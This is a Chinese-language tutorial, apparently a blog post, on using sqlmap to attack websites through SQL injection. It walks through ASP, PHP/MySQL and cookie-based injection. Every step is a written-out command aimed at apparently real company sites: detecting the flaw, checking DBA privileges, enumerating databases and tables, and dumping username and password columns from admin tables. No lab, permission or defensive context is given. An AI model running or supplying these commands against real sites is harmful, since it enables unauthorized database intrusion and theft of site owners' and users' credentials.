sqlmap(网站数据库注入)

一、ASP网站

1.

sqlmap -u “http://www.czypjx.com/News_show.asp?id=110” 

-u  “检测是否存在注入”

  返回数据库的名字  

查看数据库信息及是否存在注入漏洞(绿色可以注入,黄色不可)

2.

sqlmap -u “http://www.czypjx.com/News_show.asp?id=110”   --tables

猜解出所有表名

选择"user" "admin"

3.

sqlmap -u "http://www.czypjx.com/News_show.asp?id=110" --columns -T "user"

--columns   猜列名  根据user表

4.

 sqlmap -u "http://www.czypjx.com/News_show.asp?id=110" --dump -C "username,password" -T "user" 

--dump  下载数据      -C “username,password” 列名

 

二、PHP网站(一般是mysql的数据库)

1. 检测

sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”

2.是否dba权限

sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”  --is-dba

3.列出所有数据库

sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”  --dbs

4.查找自己的数据库

sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”  --current-db

5.查询所有表名

sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --tables -D "ggec"

查询所有表名, 根据ggec数据库来查询

6.查询所有的列

sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69"  --colums -T “ggec_admin” -D "ggec"

“ggec_admin”是选择的表名

7.查询列的字段

sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69"  --dump -C “username,password” -T “ggec_admin” -D "ggec"

 

三、ASP网站的Cookie注入

1.

sqlmap -u "http://www.wisefund.com.cn/about.asp?id=56“ 

显示不能注入

修改为

sqlmap -u “http://www.wisefund.com.cn/about.asp  ” --cookie “id=56” --level 2

--cookie  “”  这里写ID的参数 

有时这样就可以注入了 

2.

sqlmap -u “http://www.wisefund.com.cn/about.asp  ” --tables --cookie “id=56” --level 2

3.

sqlmap -u “http://www.wisefund.com.cn/about.asp  ” --columns -T “user” --cookie “id=56” --level 2

4.

sqlmap -u “http://www.wisefund.com.cn/about.asp  ”--dump  -C “username,password” -T “user” --cookie “id=56” --level 2

你可能感兴趣的:(sqlmap(网站数据库注入))